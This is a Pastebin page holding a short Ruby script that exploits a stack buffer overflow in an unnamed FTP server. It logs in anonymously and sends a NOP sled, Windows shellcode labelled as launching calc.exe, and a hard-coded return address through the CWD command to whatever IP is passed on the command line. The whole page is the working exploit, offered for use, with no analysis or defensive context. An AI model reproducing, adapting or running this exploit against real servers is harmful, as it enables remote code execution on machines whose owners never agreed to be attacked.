Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/ruby
- require 'net/ftp'
- nops = "\x90" * 103 # 103 byte NOP Sled
- # 165 byte payload - windows/exec CMD=calc.exe
- shellcode = "\xdd\xc1\xd9\x74\x24\xf4\xb8\xb3\xc7\x02\x95\x29\xc9\x5a\xb1\x24"+
- "\x83\xea\xfc\x31\x42\x13\x03\xf1\xd4\xe0\x60\x09\x32\xa0\x8a\xf1"+
- "\xc3\xa2\xce\xcd\x48\xc8\xd5\x55\x4e\xde\x5d\xea\x48\xab\x3d\xd4"+
- "\x69\x40\x88\x9f\x5e\x1d\x0a\x71\xaf\xe1\x94\x21\x54\x21\xd2\x3e"+
- "\x94\x68\x16\x41\xd4\x86\xdd\x7a\x8c\x7c\x1a\x09\xc9\xf6\x7d\xd5"+
- "\x10\xe2\xe4\x9e\x1f\xbf\x63\xff\x03\x3e\x9f\x74\x27\xcb\x5e\x61"+
- "\xd1\x97\x44\x71\x21\x16\x45\x1d\x2e\x19\x75\x58\xf0\xe2\x79\xe9"+
- "\xb1\x1e\x09\x9d\x2d\xb2\x86\x35\x46\x27\x91\x4e\xd6\x07\xa2\x50"+
- "\xd7\xec\xcb\x6c\x88\xc3\xfd\xec\x60\xad\xfa\x6f\x4c\xd6\xaa\x07"+
- "\xbd\xa3\x4f\x88\x55\x2c\xb1\xbc\xa8\x1b\xb1\x27\xd7\xc2\x21\xc4"+
- "\x36\x60\xc2\x6f\x47"
- EIP = "\x7C\x7F\x43\x7E"
- user = "anonymous"
- pass = "anonymous"
- payload = "#{nops}#{shellcode}#{EIP}"
- unless ARGV[0]
- puts "USAGE: exploit <target ip>\n\n"
- exit!
- else
- host = ARGV[0]
- puts "Connecting to #{host}"
- ftp = Net::FTP.open("#{host}")
- unless ftp
- puts "Could not establish connection"
- exit!
- else
- ftp.sendcmd("user #{user}")
- ftp.sendcmd("pass #{pass}")
- puts "connected to #{host} as user: #{user}"
- puts "sending exploit"
- ftp.sendcmd("cwd #{payload}")
- end
- ftp.close
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement